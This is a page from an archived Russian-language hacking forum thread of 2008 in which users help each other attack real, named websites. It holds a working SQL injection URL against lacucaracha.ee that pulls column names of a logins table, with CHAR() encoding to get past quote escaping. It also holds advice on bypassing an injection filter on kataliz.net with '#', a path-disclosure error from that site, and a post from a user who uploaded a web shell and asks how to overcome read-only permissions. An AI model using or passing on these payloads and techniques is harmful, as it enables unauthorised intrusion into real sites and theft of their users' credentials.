FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 308 из 2422

308

Опции темы

Поиск в этой теме

Опции просмотра

29.08.2008, 02:08

Red_Red1

Участник форума

Регистрация: 12.01.2007

Сообщений: 262

Провел на форуме:
4608122

Репутация: 874

Отправить сообщение для Red_Red1 с помощью ICQ

Все работает. Под чаром cucca_logins , так как кавчки экранирует

Цитата:

http://www.lacucaracha.ee/index.php?mod=menyy&kat=-4+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.columns+where+table_name=CHAR(99, 117,99,99,97,95,108,111,103,105,110,115)--

29.08.2008, 02:17

zjuk@

Новичок

Регистрация: 04.09.2007

Сообщений: 13

Провел на форуме:
29295

Репутация: 4

Отправить сообщение для zjuk@ с помощью ICQ

Цитата:

Сообщение от Red_Red1

Все работает. Под чаром cucca_logins , так как кавчки экранирует

спасибо большое, оказывается в запросе очипятывался =)

Цитата:

Скачай SIPT (http://forum.antichat.ru/thread24918-SIPT.html)
Настройки поставь

Спасибо есть, тока при поиске столбцов вылетает =( а при поиске таблиц нормально.
Пасибки всем

29.08.2008, 02:22

Grema

Участник форума

Регистрация: 29.11.2005

Сообщений: 122

Провел на форуме:
1050637

Репутация: 27

Цитата:

Сообщение от zjuk@

Спасибо есть, тока при поиске столбцов вылетает =( а при поиске таблиц нормально.

попробуй с моими настройками может прокатит, то у меня столбцы показывает. Если не получиться, говори в какой таблице столбцы надо

29.08.2008, 02:36

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

помогите определить тип хеша

Код:

%C6%EF%23%5D%B6%E8%E9%3D%3B%A7%D0%A9%18%9FX%C1%13%08s%D5%B0%DAG%5CF%DFV%DA%0D%DE%BCe

вот ещё один

Код:

1%FC%D47__%F8%B97x%1E%3F8%212_%D1%FA%AA_%11o%D3%D2%21%3FK%06%B4%02U%24

двиг сайта с которого выдрал хеши самописный
з.ы. хеши без пробелов

29.08.2008, 02:43

_Pantera_

Участник форума

Регистрация: 06.10.2006

Сообщений: 226

Провел на форуме:
3025546

Репутация: 1327

Отправить сообщение для _Pantera_ с помощью ICQ

это url кодировка

29.08.2008, 02:49

USAkid

Участник форума

Регистрация: 17.06.2008

Сообщений: 214

Провел на форуме:
964766

Репутация: 228

html_full походу

вот faq о хэшах:

http://forum.antichat.ru/thread26983.html

Последний раз редактировалось USAkid; 29.08.2008 в 02:52..

29.08.2008, 02:56

SVAROG

Постоянный

Регистрация: 13.02.2007

Сообщений: 406

Провел на форуме:
2706059

Репутация: 206

_Pantera_ USAkid при декодировании получаеться какаой то мусор типа
1üÔ7__ø¹7x?8!2_Ñúª_oÓÒ!?K´U$

29.08.2008, 04:15

tor4)

Познающий

Регистрация: 27.05.2008

Сообщений: 51

Провел на форуме:
611529

Репутация: 41

Ломаю http://kataliz.net много sql, но фильтрация обламывает.
при коментариев /* фильтр
при -- пропискает после себя)
НО при %00 выдаёт следущие.

http://kataliz.net/silencers/15%27%00

Software error:

HTML::Template->new() : Cannot open included file /home/katalizn/public_html/cgi-bin/Templates/Template_.tmpl : file not found. at /home/katalizn/public_html/cgi-bin/Template.pm line 1616
HTML::Template::_init_template('HTML::Template=HAS H(0x82efe14)') called at /home/katalizn/public_html/cgi-bin/Template.pm line 1189
HTML::Template::_init('HTML::Template=HASH(0x82efe 14)') called at /home/katalizn/public_html/cgi-bin/Template.pm line 1083
HTML::Template::new('HTML::Template', 'filename', '/home/katalizn/public_html/cgi-bin/Templates/Template_.tmpl', 'global_vars', 'on', 'die_on_bad_params', 0, 'search_path_on_include', 1, ...) called at siteengine.cgi line 116

--------------------------------------------------------------------------
Как бы обойти фильтрацию, и что эта за ошибка? в php скриптах раскритие питей на перл!? так чтоли?

Последний раз редактировалось tor4); 29.08.2008 в 05:15..

29.08.2008, 06:55

n0ne

Постоянный

Регистрация: 01.01.2007

Сообщений: 796

Провел на форуме:
2693408

Репутация: 861

tor4), при чем здесь %00? Это не комментарий.

Цитата:

Как бы обойти фильтрацию

Попробуй "#".

Цитата:

и что эта за ошибка?

Ты же сам уже ответил себе - раскрытие пути

Цитата:

в php скриптах раскритие питей на перл!? так чтоли?

Сам понял что сказал?

Если у файла расширение php - далеко не факт, что это php скрипт. htaccess никто не отменял. Тем более, если ты внимательно прочтешь ошибку, то увидишь, что идет обращение к siteengine.cgi, а там может быть и такая ошибка. Откуда ты взял вообще перл?

#10

29.08.2008, 10:34

softrix

Новичок

Регистрация: 05.07.2008

Сообщений: 16

Провел на форуме:
64853

Репутация: 7

Залил шелл, но все папки и файлы кромер upload read-only, chmod не меняет права доступа.
Т.е. все файлы читать можно, но вот переписать, удалить или перезалить шел в другую папку не выходит.

Можно ли как-то снять защиту от записи на файлах?

Страница 308 из 2422

308

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)

Быстрый переход

ANTICHAT.XYZ